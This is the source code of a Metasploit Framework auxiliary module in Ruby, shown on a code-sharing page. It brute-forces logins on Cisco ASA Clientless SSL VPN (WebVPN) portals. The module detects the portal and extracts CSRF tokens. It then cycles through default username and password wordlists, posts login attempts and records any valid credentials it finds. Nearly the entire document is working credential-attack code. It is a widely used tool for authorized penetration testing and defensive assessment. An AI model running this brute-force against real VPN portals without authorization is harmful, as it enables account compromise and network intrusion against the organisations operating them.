CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::AuthBrute

10
  include Msf::Auxiliary::Scanner

11
  include Msf::Exploit::Deprecated

12
  moved_from 'auxiliary/scanner/http/cisco_asa_asdm'

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Cisco ASA Clientless SSL VPN (WebVPN) Brute-force Login Utility',

19
        'Description' => %q{

20
          This module scans for Cisco ASA Clientless SSL VPN (WebVPN) web login portals and

21
          performs login brute-force to identify valid credentials.

22
        },

23
        'Author' => [

24
          'Jonathan Claudius <jclaudius[at]trustwave.com>', # original Metasploit module

25
          'jbaines-r7' # updated module

26
        ],

27
        'References' => [

28
          [ 'URL', 'https://www.cisco.com/c/en/us/support/docs/security-vpn/webvpn-ssl-vpn/119417-config-asa-00.html' ]

29
        ],

30
        'License' => MSF_LICENSE,

31
        'DefaultOptions' => {

32
          'RPORT' => 443,

33
          'SSL' => true

34
        },

35
        'Notes' => {

36
          'Stability' => [CRASH_SAFE],

37
          'SideEffects' => [IOC_IN_LOGS],

38
          'Reliability' => []

39
        }

40
      )

41
    )

42


43
    register_options(

44
      [

45
        OptString.new('GROUP', [true, 'The connection profile to log in to (blank by default)', '']),

46
        OptPath.new('USERPASS_FILE', [

47
          false, 'File containing users and passwords separated by space, one pair per line',

48
          File.join(Msf::Config.data_directory, 'wordlists', 'http_default_userpass.txt')

49
        ]),

50
        OptPath.new('USER_FILE', [

51
          false, 'File containing users, one per line',

52
          File.join(Msf::Config.data_directory, 'wordlists', 'http_default_users.txt')

53
        ]),

54
        OptPath.new('PASS_FILE', [

55
          false, 'File containing passwords, one per line',

56
          File.join(Msf::Config.data_directory, 'wordlists', 'http_default_pass.txt')

57
        ])

58
      ]

59
    )

60
  end

61


62
  def run_host(_ip)

63
    # Establish the remote host is running the clientless vpn

64
    res = send_request_cgi('uri' => normalize_uri('/+CSCOE+/logon.html'))

65
    if res && res.code == 200 && res.get_cookies.include?('webvpn')

66
      print_status('The remote target appears to host Cisco SSL VPN Service. The module will continue.')

67
      print_status('Starting login brute force...')

68


69
      each_user_pass do |user, pass|

70
        do_login(user, pass)

71
      end

72
    else

73
      print_status('Cisco SSL VPN Service not detected on the remote target')

74
    end

75
  end

76


77
  def report_cred(opts)

78
    service_data = {

79
      address: opts[:ip],

80
      port: opts[:port],

81
      service_name: 'Cisco ASA SSL VPN Service',

82
      protocol: 'tcp',

83
      workspace_id: myworkspace_id

84
    }

85


86
    credential_data = {

87
      origin_type: :service,

88
      module_fullname: fullname,

89
      username: opts[:user],

90
      private_data: opts[:password],

91
      private_type: :password

92
    }.merge(service_data)

93


94
    login_data = {

95
      last_attempted_at: DateTime.now,

96
      core: create_credential(credential_data),

97
      status: Metasploit::Model::Login::Status::SUCCESSFUL,

98
      proof: opts[:proof]

99
    }.merge(service_data)

100


101
    create_credential_login(login_data)

102
  end

103


104
  # Brute-force the login page

105
  def do_login(user, pass)

106
    vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}")

107


108
    # some versions require we snag a CSRF token. So visit the logon portal

109
    res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri('/+CSCOE+/logon.html'))

110
    return unless res && res.code == 200

111


112
    vars_hash = {

113
      'tgroup' => '',

114
      'next' => '',

115
      'tgcookieset' => '',

116
      'username' => user,

117
      'password' => pass,

118
      'Login' => 'Login'

119
    }

120


121
    cookie = 'webvpnlogin=1'

122


123
    # the web portal may or may not contain CSRF tokens. So snag the token if it exists.

124
    if res.body.include?('csrf_token')

125
      csrf_token = res.body[/<input name="csrf_token" type=hidden value="(?<token>[0-9a-f]+)">/, :token]

126
      if csrf_token

127
        vars_hash['csrf_token'] = csrf_token

128
        cookie = "#{cookie}; CSRFtoken=#{csrf_token};"

129
      else

130
        print_error('Failed to grab the CSRF token')

131
        return

132
      end

133
    end

134


135
    # only add the group if the user specifies a non-empty value

136
    unless datastore['GROUP'].nil? || datastore['GROUP'].empty?

137
      vars_hash['group_list'] = datastore['GROUP']

138
    end

139


140
    res = send_request_cgi({

141
      'uri' => normalize_uri('/+webvpn+/index.html'),

142
      'method' => 'POST',

143
      'ctype' => 'application/x-www-form-urlencoded',

144
      'cookie' => cookie,

145
      'vars_post' => vars_hash

146
    })

147


148
    # check if the user was likely forwarded to the clientless vpn page

149
    if res && res.code == 200 && res.body.include?('/+webvpn+/webvpn_logout.html') && res.body.include?('/+CSCOE+/session.js')

150


151
      print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")

152
      report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)

153


154
      # logout - the default vpn connection limit is 2 so it's best to free this one up. Unfortunately,

155
      # we need a CSRF and non-CSRF version for this as well.

156
      if res.body.include?('csrf_token')

157
        csrf_token = res.body[/<input type="hidden" name="csrf_token" value="(?<token>[0-9a-f]+)">/, :token]

158


159
        # if we don't pull out the token... just keep going? Failing logout isn't the end of the world.

160
        if csrf_token

161
          send_request_cgi(

162
            'uri' => normalize_uri('/+webvpn+/webvpn_logout.html'),

163
            'method' => 'POST',

164
            'vars_post' => { 'csrf_token' => csrf_token },

165
            'cookie' => res.get_cookies

166
          )

167
        end

168
      else

169
        send_request_cgi('uri' => normalize_uri('/+webvpn+/webvpn_logout.html'), 'cookie' => res.get_cookies)

170
      end

171


172
      return :next_user

173
    else

174
      vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}")

175
    end

176
  end

177
end

178


179